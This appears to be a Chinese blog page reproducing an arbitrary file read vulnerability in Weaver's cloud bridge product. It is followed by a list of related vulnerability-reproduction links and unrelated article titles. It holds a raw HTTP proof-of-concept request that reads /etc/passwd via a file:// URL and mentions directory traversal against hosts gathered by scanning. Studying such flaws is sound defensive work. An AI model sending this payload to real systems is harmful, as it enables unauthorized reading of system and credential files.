1.老规矩,搜寻目标机器(xpath用起来确实很方便)

2.根据网上的POC试试:

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*

3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍:

发现这个好像有戏,没有/etc/passwd,并且还是双斜杠,合理猜测应该是安装在windows上的,尝试目录遍历

再访问该文件(这里不是读文件名,而是访问文件id):

影响版本:

泛微云桥任意文件读取漏洞复现[09/18]相关推荐

  1. Apache Solr任意文件读取漏洞复现

    Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...

  2. CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

    CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...

  3. Grafana 任意文件读取漏洞复现

    一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...

  4. CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

    漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...

  5. GitLab任意文件读取漏洞复现(CVE-2020-10977)

    0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务.GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git ...

  6. CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现

    目录 1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开 ...

  7. GateOne CVE-2020-35736 任意文件读取漏洞复现

    0x00:简介 GateOne 是一款使用 HTML5 技术编写的网页版 SSH 终端模拟器.基于现代的 HTML5 技术,无需任何浏览器插件.支持多个 SSH 进程.可以嵌入到其他任意应用程序中.支 ...

  8. Grafana 未授权任意文件读取漏洞复现

    1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../. ...

  9. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  10. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

最新文章

  1. php中常见的错误类型有,JavaScript中常见的错误类型有哪些?(详细介绍)
  2. 选购光端机有哪些必备条件
  3. 设计模式——模版方法
  4. JQuery Datatables 在Bootstrap tab中列名无法对齐的问题
  5. DataSet运用DES加解密到Xml
  6. CentOS 6 上安装 pip、setuptools
  7. python下载股票数据_如何下载股票历史数据?
  8. Tomcat设置编码方式
  9. 判断手机横屏和竖屏方向
  10. c++中string 各种函数的函数用法
  11. 用python解决放苹果问题_放苹果
  12. docker入门——构建镜像
  13. python爬新闻并保存到csv_python爬取信息并保存至csv
  14. 程序员技术入股的那些坑
  15. K8S调用GPU资源配置指南
  16. BundleFusion的实现——RealSense D435i+Win10+VS2013+cuda8.0
  17. 7-6 哲哲打游戏 (25 分)
  18. 如何健壮你的后端服务?
  19. vlc option以及常见问题解决方案
  20. Python爬虫实战:爬取贝壳网二手房40000条数据

热门文章

  1. QTcpSocket目录文件传输
  2. mbedtls基础及其应用
  3. 史上MySQL安装配置教程最细,一步一图解
  4. matlab中适应度函数怎么编写,matlab常用的几个适应度评价函数
  5. 文献阅读笔记之 - - 48V锂电池管理系统的设计与实现(贾小龙)
  6. PS给证件照换背景颜色
  7. 30余种加密编码类型的密文特征分析(建议收藏)
  8. 利用matlab信号带宽,测量均值频率、功率、带宽
  9. 总结几个有关国家行政区划的问题
  10. vmware安装安卓android详教程,虚拟机安装安卓系统教程